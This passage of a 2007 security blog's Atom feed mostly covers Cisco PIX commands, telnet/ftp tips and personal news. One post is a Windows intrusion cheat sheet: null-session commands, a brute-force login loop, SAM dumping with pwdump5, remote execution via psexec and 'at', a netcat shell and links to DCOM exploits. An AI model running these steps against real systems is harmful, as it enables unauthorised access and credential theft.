href="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rn-H8QIqNuI/AAAAAAAAAXg/lxMpZ9iLlCw/s1600-h/snom.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/Rn-H8QIqNuI/AAAAAAAAAXg/lxMpZ9iLlCw/s200/snom.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5079928373890397922" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8687376048708663293?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8687376048708663293/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8687376048708663293' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8687376048708663293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8687376048708663293'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/snom-phones-web-interface-exposed-to.html' title='Snom phones web interface exposed to public.'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/'
url='http://bp0.blogger.com/_Zx8XWzC_KPQ/Rn-H8QIqNuI/AAAAAAAAAXg/lxMpZ9iLlCw/s72-c/snom.JPG' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3336031074974899738</id><published>2007-06-24T12:15:00.000+08:00</published><updated>2007-06-24T12:47:55.970+08:00</updated><title type='text'>Hakin9 X Hackathology</title><content type='html'>This past week, I was invited by &lt;a href="http://en.hakin9.org/"&gt;hakin9&lt;/a&gt; magazine to write an article about the latest hacking skills. I am still thinking about a topic to write on. There are different types of hacks and I am in a dilemma choosing one. After pondering for some time, I think I would love to write about VoIP hacks. Personally, because VoIP is a subset of network security, I think it's best to write something that I am good at. I had already set up a PBX server and now it's up to the guys at hakin9. The hakin9 team is a bunch of really cool and nice guys. They gave me a free copy of their magazine and once my article is published, they will also send me a copy of the published issue. I will keep you guys updated on this. 
Let me know what you guys think?&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3336031074974899738?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3336031074974899738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3336031074974899738' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3336031074974899738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3336031074974899738'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/hakin9-x-hackathology.html' title='Hakin9 X Hackathology'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1005092164822465313</id><published>2007-06-22T12:42:00.000+08:00</published><updated>2007-06-22T12:51:00.605+08:00</updated><title type='text'>David Litchfield new Oracle book</title><content type='html'>I had been wanting to learn more about Oracle hacking and I would not say I am not really good in Oracle Security. I managed to set up an Oracle Database server and do some simple exploitation and auditing; however, I know that for me to be good in that aspect, it would require me to focus most of my time trying to exploit and learn the techniques of hacking the database. 
This past week, it had come to my attention that David Litchfield (Oracle Security Guru, Google him to find out more) had published a book called &lt;a href="http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221/ref=pd_bbs_sr_1/104-9998503-3375956?ie=UTF8&amp;s=books&amp;qid=1182487258&amp;sr=8-1"&gt;Oracle Hacker's Handbook&lt;/a&gt;. I highly recommend anyone who loves Oracle Security to purchase this book. Although I have not laid my hands on this book, it will soon be on my bookshelves.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1005092164822465313?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1005092164822465313/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1005092164822465313' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1005092164822465313'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1005092164822465313'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/david-litchfield-new-oracle-book.html' title='David Litchfield new Oracle book'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4698792674537223112</id><published>2007-06-18T13:42:00.000+08:00</published><updated>2007-06-18T13:44:49.745+08:00</updated><title type='text'>Using ftp with CUTCP telnet</title><content 
type='html'>Check out CUTCP&lt;br /&gt;&lt;br /&gt;"&lt;strong&gt;Telnet&lt;/strong&gt; is a program used to interactively log in to a remote computer. &lt;strong&gt;CUTCP telnet&lt;/strong&gt; is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it: &lt;br /&gt;&lt;br /&gt;1) First use &lt;strong&gt;telnet&lt;/strong&gt; to log in to the remote host.&lt;br /&gt;&lt;br /&gt;2) Press &lt;strong&gt;Alt/T&lt;/strong&gt;. This will generate an &lt;strong&gt;ftp&lt;/strong&gt; command with the proper network address and start the ftp client program on the interactive host.&lt;br /&gt;&lt;br /&gt;3) When it asks for a name, enter anything.&lt;br /&gt;&lt;br /&gt;4) When it asks for a password, press &lt;strong&gt;Alt/W&lt;/strong&gt;. This will provide a hidden password to authenticate the connection.&lt;br /&gt;&lt;br /&gt;Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the &lt;strong&gt;put&lt;/strong&gt; command. 
To transfer a file from the PC to the interactive host, use the &lt;strong&gt;get&lt;/strong&gt; command."&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4698792674537223112?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4698792674537223112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4698792674537223112' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4698792674537223112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4698792674537223112'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/using-ftp-with-cutcp-telnet.html' title='Using ftp with CUTCP telnet'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8908071245053723588</id><published>2007-06-17T20:24:00.000+08:00</published><updated>2007-06-17T20:34:30.156+08:00</updated><title type='text'>Regular Expressions with Cisco IOS</title><content type='html'>I was reading some Cisco stuff today and I knew long ago that Cisco IOS allows regular expressions for simplification of search tasks and other uses. Well, back then I did not research much on it, but I just came across 2 sites which provide more explanation with regards to Cisco IOS regex. 
&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm"&gt;http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nil.com/ipcorner/EnhanceIOSUI/"&gt;http://www.nil.com/ipcorner/EnhanceIOSUI/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8908071245053723588?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8908071245053723588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8908071245053723588' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8908071245053723588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8908071245053723588'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/regular-expressions-with-cisco-ios.html' title='Regular Expressions with Cisco IOS'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8056151264911955456</id><published>2007-06-16T17:17:00.000+08:00</published><updated>2007-06-16T17:23:29.097+08:00</updated><title type='text'>Cisco Router's DNS server to kill browser advertisement</title><content type='html'>I just happen to stumble across &lt;a 
href="http://ioshints.blogspot.com/2007/06/kill-browser-ads-with-cisco-router-dns.html"&gt;ioshints blog&lt;/a&gt;. He mentioned something about the cisco router's dns server having a way to prevent unwanted website advertisement. You guys can read more at: &lt;a href="http://www.nil.com/ipcorner/RouterDNS/"&gt;http://www.nil.com/ipcorner/RouterDNS/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8056151264911955456?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8056151264911955456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8056151264911955456' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8056151264911955456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8056151264911955456'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/cisco-routers-dns-server-to-kill.html' title='Cisco Router&apos;s DNS server to kill browser advertisement'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3028586840553857506</id><published>2007-06-16T15:11:00.001+08:00</published><updated>2007-06-16T15:11:32.427+08:00</updated><title type='text'>Hacking Old Skoolz Windows</title><content type='html'>Port 135 (client-server communications)&lt;br /&gt;&lt;br /&gt;Port 139, 445 (authentication and file sharing)&lt;br /&gt;&lt;br 
/&gt;Port 137,138 (NetBIOS browser, name and lookup functions)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nmap server to look for port 135&lt;br /&gt;&lt;br /&gt;Run rpcscan or epdump on server over port tcp or udp port 135&lt;br /&gt;&lt;br /&gt;If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports&lt;br /&gt;&lt;br /&gt;Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.&lt;br /&gt;&lt;br /&gt;Run walksam query if SMAR interface is present to glean user information.&lt;br /&gt;&lt;br /&gt;Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present&lt;br /&gt;&lt;br /&gt;Compromise admin password using brute force tool WMICracker.&lt;br /&gt;&lt;br /&gt;Use Remoxec to execute arbitrary commands.&lt;br /&gt;&lt;br /&gt;Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. 
Else download exploits from&lt;br /&gt;&lt;br /&gt;http://packetstormsecurity.org/0307-exploits/dcom.c&lt;br /&gt;http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip&lt;br /&gt;http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip&lt;br /&gt;http://packetstormsecurity.org/0307-exploits/oc192-dcom.c&lt;br /&gt;http://examples.oreilly.com/networksa/tools/dcom-exploits.zip&lt;br /&gt;http://www.securityfocus.com/bid/8205/exploit/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DCOM interface can be exploited through:&lt;br /&gt;&lt;br /&gt;TCP and UDP port 135 (through RPC server service)&lt;br /&gt;TCP ports 139 and 445 (through SMB and named pipes)&lt;br /&gt;TCP port 593 (through COM Internet Services, if installed)&lt;br /&gt;Use kaHt2 to exploit a remote shell&lt;br /&gt;Use SPKIE msrpcfuzz fuzzer to do stress test.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;NetBIOS Name Service UDP port 137&lt;br /&gt;&lt;br /&gt;Dumping NetBIOS table: Nbtstat –A 192.168.1.152&lt;br /&gt;&lt;br /&gt;Local Area Connection:&lt;br /&gt;Node IpAddress: [192.168.1.20] Scope Id: []&lt;br /&gt;&lt;br /&gt;NetBIOS Remote Machine Name Table&lt;br /&gt;&lt;br /&gt;       Name               Type         Status&lt;br /&gt;    ---------------------------------------------&lt;br /&gt;    CARAA          &lt;00&gt;  UNIQUE      Registered&lt;br /&gt;    WORKGROUP      &lt;00&gt;  GROUP       Registered&lt;br /&gt;    CARAA          &lt;20&gt;  UNIQUE      Registered&lt;br /&gt;    WORKGROUP      &lt;1E&gt;  GROUP       Registered&lt;br /&gt;&lt;br /&gt;    MAC Address = 00-0D-88-CB-30-0B&lt;br /&gt;&lt;br /&gt;------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;00&gt;  unique  hostname&lt;br /&gt;&lt;00&gt;  group  domain name&lt;br /&gt;&lt;host name&gt;&lt;03&gt;  unique  Messenger service running for that computer&lt;br /&gt;&lt;use name&gt;&lt;03&gt;   
unique  Messenger service running for that individual logged in user&lt;br /&gt;&lt;20&gt; unique  Server service running&lt;br /&gt;&lt;1D&gt;  group  Master browser name for the subnet&lt;br /&gt;&lt;1B&gt;  unique  Domain master browser name, identifies PDC for that domain&lt;br /&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NetBIOS Datagram Service UDP port 138&lt;br /&gt;http://www.securityfocus.com/advisories/2556&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NetBIOS Session Service TCP port 139&lt;br /&gt;&lt;br /&gt;Connect through null session: &lt;br /&gt;&lt;br /&gt;net use \\192.168.1.152\IPC$ “” /user:””&lt;br /&gt;net view \\192.168.1.152&lt;br /&gt;Use tools like enum, GetAcct and winfo to enumerate more info.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.&lt;br /&gt;&lt;br /&gt;1. Create a file credentials.txt with username and password:&lt;br /&gt;&lt;br /&gt;Password  Username&lt;br /&gt;“”   Administrator&lt;br /&gt;Password  Administrator&lt;br /&gt;Admin   Administrator&lt;br /&gt;&lt;br /&gt;2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j&lt;br /&gt;&lt;br /&gt;3. 
Using the NetBIOS tool with LOOP&lt;br /&gt;FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i &gt; out.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Connect through valid user:&lt;br /&gt;Smbclient to enumerate more info.&lt;br /&gt;net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)&lt;br /&gt;net use \\192.168.1.152\C$ ronald3211 /user:scadmin&lt;br /&gt;at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe&lt;br /&gt;&lt;br /&gt;Modify and accessing registry keys using &lt;br /&gt;Regdmp.exe&lt;br /&gt;Regini.exe&lt;br /&gt;Reg.exe&lt;br /&gt;&lt;br /&gt;Accessing the SAM Database and LSASS&lt;br /&gt;&lt;br /&gt;Pwdump5&lt;br /&gt;Lsadump2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CIFS Service running on TCP and UDP port 445&lt;br /&gt;&lt;br /&gt;SMB-AT to enumerate user and system info.&lt;br /&gt;Smbserverscan to scan for smb related ports.&lt;br /&gt;Smbgetserverinfo to get server info.&lt;br /&gt;smbNAT to provide more details about the server info.&lt;br /&gt;&lt;br /&gt;Smbdumpusers to enumerate port 139 and 445.&lt;br /&gt;Smbdumpusers –i 192.168.1.152 –m 2 –P1&lt;br /&gt;&lt;br /&gt;Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.&lt;br /&gt;Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1&lt;br /&gt;&lt;br /&gt;Need to have admin user name and password.&lt;br /&gt;Samrdump to list all username in server&lt;br /&gt;Rpcdump to list all endpoint bindings&lt;br /&gt;&lt;br /&gt;Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa&lt;br /&gt;Restrictanonymous =0, 1, 2&lt;br /&gt;&lt;br /&gt;Use pwdump5 to capture SAM file.&lt;br /&gt;Use netcat to open a shell on remote OS&lt;br /&gt;Use psexec through port 139 or 445 to execute command&lt;br /&gt;Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;IIS buffer overflow&lt;br /&gt;&lt;br /&gt;IIS 5.0 SSL Remote root exploit use thciisslame&lt;div 
class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3028586840553857506?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3028586840553857506/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3028586840553857506' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3028586840553857506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3028586840553857506'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html' title='Hacking Old Skoolz Windows'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-702013100200149601</id><published>2007-06-13T15:55:00.000+08:00</published><updated>2007-06-13T17:51:36.684+08:00</updated><title type='text'>Cisco's PIX/ASA TCP flags syntax</title><content type='html'>Have you guys ever wondered how the PIX or ASA firewall TCP 3-way handshake works? Well, it's absolutely similar to how the normal TCP/IP handshake works. Just a little different in terms of the syntax. For instance, the &lt;strong&gt;SYN&lt;/strong&gt; flag in PIX is known as &lt;strong&gt;saA&lt;/strong&gt;. For troubleshooting purposes, you would however need to know these flags in PIX/ASA. 
I had summarised a table of the flags and how it works.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rm-5gwIqNtI/AAAAAAAAAXY/D_PV-SHwbRA/s1600-h/FW+flags.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rm-5gwIqNtI/AAAAAAAAAXY/D_PV-SHwbRA/s200/FW+flags.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5075479277398013650" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-702013100200149601?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/702013100200149601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=702013100200149601' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/702013100200149601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/702013100200149601'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/ciscos-pix-asa-troubleshooting.html' title='Cisco&apos;s PIX/ASA TCP flags syntax'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Zx8XWzC_KPQ/Rm-5gwIqNtI/AAAAAAAAAXY/D_PV-SHwbRA/s72-c/FW+flags.JPG' height='72' 
width='72'/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6413056023323171820</id><published>2007-06-12T13:44:00.000+08:00</published><updated>2007-06-12T15:24:26.334+08:00</updated><title type='text'>PIX firewall troubleshooting commands</title><content type='html'>I am adding some commonly used PIX firewall troubleshooting commands. For those of you who do troubleshooting of the firewall, you should familiarise yourself with these commands. Handy yet powerful.&lt;br /&gt;&lt;br /&gt;1. &lt;strong&gt;show xlate, show xlate detail&lt;/strong&gt; - display NAT translations and their details&lt;br /&gt;&lt;br /&gt;2. &lt;strong&gt;show connection, show connection detail&lt;/strong&gt; - display connection details built in the firewall&lt;br /&gt;&lt;br /&gt;3. &lt;strong&gt;show service-policy&lt;/strong&gt; - display inspection policies&lt;br /&gt;&lt;br /&gt;4. &lt;strong&gt;show local-host 192.168.1.1&lt;/strong&gt; - display translation, AAA, connection information&lt;br /&gt;&lt;br /&gt;5. &lt;strong&gt;show asp drop&lt;/strong&gt; - show number of packets dropped while processing the packets&lt;br /&gt;&lt;br /&gt;6. &lt;strong&gt;show mem&lt;/strong&gt; - display memory usage in the PIX&lt;br /&gt;&lt;br /&gt;7. &lt;strong&gt;show cpu usage&lt;/strong&gt; - display CPU usage over a time period&lt;br /&gt;&lt;br /&gt;8. &lt;strong&gt;show traffic&lt;/strong&gt; - display total traffic transmitted and received on each individual interface on the PIX&lt;br /&gt;&lt;br /&gt;9. &lt;strong&gt;show block&lt;/strong&gt; and &lt;strong&gt;show cpu usage&lt;/strong&gt; can determine if the firewall is overloaded.&lt;br /&gt;&lt;br /&gt;Of course there are many other things you would need to know, like the debug commands, capture commands, show logging, show running logging, show logging setting commands. 
If you guys need to know more, just email me and I will guide you.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6413056023323171820?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6413056023323171820/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6413056023323171820' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6413056023323171820'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6413056023323171820'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/06/pix-firewall-troubleshooting-commands.html' title='PIX firewall troubleshooting commands'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7947771288615849317</id><published>2007-05-18T17:02:00.000+08:00</published><updated>2007-05-18T19:08:08.420+08:00</updated><title type='text'>Page Rank at 4</title><content type='html'>Hi guys, it's been a really long time since I updated my blog. These days, I am just pure pure busy with ideas flowing around and trying to make my ideas happen. I am actually doing lots of research and reading work and putting bits and pieces together once it is ready. I should be starting to code when I make a return trip back to Dubai from Singapore. 
Well, I was searching for the page ranking of my blog, and to my surprise, after just 2 months of blogging and commenting, I got a page rank of 4, which I am so happy about. It's like I started from 0 to 4, and now, that's an achievement for me. Check out &lt;a href="www.seochat.com"&gt;www.seochat.com&lt;/a&gt;. This hard work and perseverance will be continued on my new project and I hope to make it a success. Till then, drop me an email if you guys want to know more about networking or just say hi and I will be happy. Peace.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7947771288615849317?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7947771288615849317/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7947771288615849317' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7947771288615849317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7947771288615849317'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/05/page-rank-at-4.html' title='Page Rank at 4'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7843989312873529545</id><published>2007-04-21T15:54:00.000+08:00</published><updated>2007-04-21T16:04:24.385+08:00</updated><title type='text'>My Last Post on Security Stuffs</title><content type='html'>To all my dearest and loyal readers, I am 
sad to say that this might be the last post I make regarding network security or web security here. Why? Because I am off to something even more exciting and challenging. These 2 months of blogging have been really great, with a vast amount of knowledge exchanged with the community. It's a short yet fruitful journey for me and thank you guys for all the support and emails you gave me. I can only say sorry here because I will not have the time to actually blog too much on security again. Instead, something big and exciting is waiting ahead for me to accomplish. Nevertheless, you guys can still email me regarding security issues you have. I will try to respond fast. Once again, thank you.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7843989312873529545?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7843989312873529545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7843989312873529545' title='103 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7843989312873529545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7843989312873529545'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/my-last-post-on-security-stuffs.html' title='My Last Post on Security Stuffs'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>103</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3089242007335060179</id><published>2007-04-18T15:24:00.000+08:00</published><updated>2007-04-18T16:42:16.128+08:00</updated><title type='text'>Windows Vista Forensics</title><content type='html'>I was reading articles and I happened to stumble upon a &lt;a href="http://www.securityfocus.com/infocus/1889"&gt;Microsoft Vista forensics article&lt;/a&gt;. In this article, Jamie Morris from Forensic Focus shares his view on Vista forensics and several new Vista features. I think Microsoft is really picking up on security these days compared to the past and their response to security incidents is fast. Yes, you can argue that Vista is hacked and it is not secure, but still, which software doesn't have bugs? Most importantly, they always release patches fast after certain exploits have been discovered, allowing end users like us to update. Linux is powerful and has improved a lot over the years, but still I would prefer to use Microsoft as my main OS and Linux as a VMware image. Why? Because I think Bill Gates is great. I give full support to this man 100%. Without Bill, you wouldn't have a great OS like Windows to start your computer knowledge with. 
